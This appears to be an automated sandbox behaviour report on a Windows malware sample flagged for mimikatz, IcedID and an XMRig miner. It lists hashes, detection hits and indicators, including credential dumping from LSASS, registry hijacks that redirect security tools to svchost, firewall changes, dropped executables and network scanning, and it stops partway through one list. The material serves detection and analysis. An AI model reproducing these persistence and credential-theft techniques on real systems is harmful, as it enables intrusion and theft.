Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03-01-2025 00:12
Behavioral task
behavioral1
Sample
2025-01-02_8c0edf9595ce9a6d96f06997742ba294_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-01-02_8c0edf9595ce9a6d96f06997742ba294_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2025-01-02_8c0edf9595ce9a6d96f06997742ba294_hacktools_icedid_mimikatz.exe
-
Size
9.5MB
-
MD5
8c0edf9595ce9a6d96f06997742ba294
-
SHA1
21505dec0d90b7a44479128c49538fd5f63d357f
-
SHA256
441170f6fd736e24c626629ee4573d17af9675628e442394f61eb8944b8ae097
-
SHA512
a6fcc0aac505f120fd54f6f97fba190f1d3263c4bcd355a082c77c68429b3ae71e6d35b9a91f6ba7b2b415a841a9f17f018c1c329187cf328e3ea842ec86da86
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 5080 created 2140 5080 tmyfwky.exe 38 -
Xmrig family
-
Contacts a large (30040) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/4392-179-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp xmrig behavioral2/memory/4392-183-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp xmrig behavioral2/memory/4392-204-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp xmrig behavioral2/memory/4392-217-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp xmrig behavioral2/memory/4392-226-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp xmrig behavioral2/memory/4392-235-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp xmrig behavioral2/memory/4392-250-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp xmrig behavioral2/memory/4392-499-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp xmrig behavioral2/memory/4392-501-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp xmrig behavioral2/memory/4392-503-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp xmrig behavioral2/memory/4392-758-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp xmrig behavioral2/memory/4392-759-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/2716-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2716-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000b000000023b84-6.dat mimikatz behavioral2/memory/2584-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4764-138-0x00007FF7E30F0000-0x00007FF7E31DE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts tmyfwky.exe File opened for modification C:\Windows\system32\drivers\etc\hosts tmyfwky.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe tmyfwky.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1460 netsh.exe 3512 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 2584 tmyfwky.exe 5080 tmyfwky.exe 3868 wpcap.exe 3520 bzbnzbyct.exe 4764 vfshost.exe 4372 cmzbnyytn.exe 920 xohudmc.exe 3764 rwdxsq.exe 4392 lfbpkn.exe 2836 cmzbnyytn.exe 4288 cmzbnyytn.exe 3088 cmzbnyytn.exe 3852 cmzbnyytn.exe 512 cmzbnyytn.exe 4792 cmzbnyytn.exe 1944 tmyfwky.exe 4708 cmzbnyytn.exe 916 cmzbnyytn.exe 4556 cmzbnyytn.exe 524 cmzbnyytn.exe 116 cmzbnyytn.exe 4436 cmzbnyytn.exe 3592 cmzbnyytn.exe 4528 cmzbnyytn.exe 1876 cmzbnyytn.exe 2116 cmzbnyytn.exe 1940 cmzbnyytn.exe 4664 midctcinn.exe 4028 tmyfwky.exe -
Loads dropped DLL 12 IoCs
pid Process 3868 wpcap.exe 3868 wpcap.exe 3868 wpcap.exe 3868 wpcap.exe 3868 wpcap.exe 3868 wpcap.exe 3868 wpcap.exe 3868 wpcap.exe 3868 wpcap.exe 3520 bzbnzbyct.exe 3520 bzbnzbyct.exe 3520 bzbnzbyct.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 65 ifconfig.me 64 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F tmyfwky.exe File created C:\Windows\SysWOW64\rwdxsq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F tmyfwky.exe File opened for modification C:\Windows\SysWOW64\rwdxsq.exe xohudmc.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData tmyfwky.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft tmyfwky.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe -
resource yara_rule behavioral2/files/0x0007000000023c6b-135.dat upx behavioral2/memory/4764-136-0x00007FF7E30F0000-0x00007FF7E31DE000-memory.dmp upx behavioral2/memory/4764-138-0x00007FF7E30F0000-0x00007FF7E31DE000-memory.dmp upx behavioral2/memory/4372-142-0x00007FF7D21C0000-0x00007FF7D221B000-memory.dmp upx behavioral2/files/0x0007000000023c76-141.dat upx behavioral2/memory/4372-146-0x00007FF7D21C0000-0x00007FF7D221B000-memory.dmp upx behavioral2/files/0x0007000000023c73-163.dat upx behavioral2/memory/4392-164-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp upx behavioral2/memory/2836-172-0x00007FF7D21C0000-0x00007FF7D221B000-memory.dmp upx behavioral2/memory/4288-176-0x00007FF7D21C0000-0x00007FF7D221B000-memory.dmp upx behavioral2/memory/4392-179-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp upx behavioral2/memory/3088-181-0x00007FF7D21C0000-0x00007FF7D221B000-memory.dmp upx behavioral2/memory/4392-183-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp upx behavioral2/memory/3852-186-0x00007FF7D21C0000-0x00007FF7D221B000-memory.dmp upx behavioral2/memory/512-190-0x00007FF7D21C0000-0x00007FF7D221B000-memory.dmp upx behavioral2/memory/4792-194-0x00007FF7D21C0000-0x00007FF7D221B000-memory.dmp upx behavioral2/memory/4708-202-0x00007FF7D21C0000-0x00007FF7D221B000-memory.dmp upx behavioral2/memory/4392-204-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp upx behavioral2/memory/916-207-0x00007FF7D21C0000-0x00007FF7D221B000-memory.dmp upx behavioral2/memory/4556-211-0x00007FF7D21C0000-0x00007FF7D221B000-memory.dmp upx behavioral2/memory/524-215-0x00007FF7D21C0000-0x00007FF7D221B000-memory.dmp upx behavioral2/memory/4392-217-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp upx behavioral2/memory/116-220-0x00007FF7D21C0000-0x00007FF7D221B000-memory.dmp upx behavioral2/memory/4436-224-0x00007FF7D21C0000-0x00007FF7D221B000-memory.dmp upx behavioral2/memory/4392-226-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp upx behavioral2/memory/3592-229-0x00007FF7D21C0000-0x00007FF7D221B000-memory.dmp upx behavioral2/memory/4528-232-0x00007FF7D21C0000-0x00007FF7D221B000-memory.dmp upx behavioral2/memory/1876-234-0x00007FF7D21C0000-0x00007FF7D221B000-memory.dmp upx behavioral2/memory/4392-235-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp upx behavioral2/memory/2116-237-0x00007FF7D21C0000-0x00007FF7D221B000-memory.dmp upx behavioral2/memory/1940-239-0x00007FF7D21C0000-0x00007FF7D221B000-memory.dmp upx behavioral2/memory/4392-250-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp upx behavioral2/memory/4392-499-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp upx behavioral2/memory/4392-501-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp upx behavioral2/memory/4392-503-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp upx behavioral2/memory/4392-758-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp upx behavioral2/memory/4392-759-0x00007FF7586D0000-0x00007FF7587F0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File opened for modification C:\Windows\itcctjlje\unptrtjvi\Result.txt midctcinn.exe File created C:\Windows\itcctjlje\UnattendGC\specials\tibe-2.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\svschost.xml tmyfwky.exe File created C:\Windows\cbdnbivt\schoedcl.xml tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\svschost.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\vimpcsvc.xml tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\wpcap.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\ssleay32.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\tucl-1.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\zlib1.dll tmyfwky.exe File created C:\Windows\itcctjlje\Corporate\mimilib.dll tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\ip.txt tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\spoolsrv.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\docmicfg.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\spoolsrv.xml tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\docmicfg.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\exma-1.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\AppCapture32.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\crli-0.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\xdvl-0.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\AppCapture64.dll tmyfwky.exe File created C:\Windows\ime\tmyfwky.exe tmyfwky.exe File created C:\Windows\itcctjlje\upbdrjv\swrpwe.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\cnli-1.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\ucl.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\svschost.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\schoedcl.xml tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\spoolsrv.xml tmyfwky.exe File created C:\Windows\cbdnbivt\tmyfwky.exe 2025-01-02_8c0edf9595ce9a6d96f06997742ba294_hacktools_icedid_mimikatz.exe File created C:\Windows\itcctjlje\UnattendGC\specials\coli-0.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\trch-1.dll tmyfwky.exe File created C:\Windows\cbdnbivt\spoolsrv.xml tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\docmicfg.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\Shellcode.ini tmyfwky.exe File opened for modification C:\Windows\itcctjlje\Corporate\log.txt cmd.exe File created C:\Windows\itcctjlje\UnattendGC\specials\trfo-2.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\docmicfg.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\vimpcsvc.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\schoedcl.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\schoedcl.exe tmyfwky.exe File created C:\Windows\cbdnbivt\docmicfg.xml tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\scan.bat tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\Packet.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\libeay32.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\svschost.exe tmyfwky.exe File created C:\Windows\cbdnbivt\svschost.xml tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\schoedcl.xml tmyfwky.exe File created C:\Windows\itcctjlje\Corporate\mimidrv.sys tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\wpcap.dll tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\midctcinn.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\posh-0.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\vimpcsvc.exe tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\tmyfwky.exe 2025-01-02_8c0edf9595ce9a6d96f06997742ba294_hacktools_icedid_mimikatz.exe File created C:\Windows\cbdnbivt\vimpcsvc.xml tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\vimpcsvc.xml tmyfwky.exe File created C:\Windows\itcctjlje\Corporate\vfshost.exe tmyfwky.exe File opened for modification C:\Windows\itcctjlje\unptrtjvi\Packet.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\libxml2.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\spoolsrv.xml tmyfwky.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2408 sc.exe 4568 sc.exe 4948 sc.exe 2800 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-01-02_8c0edf9595ce9a6d96f06997742ba294_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tmyfwky.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 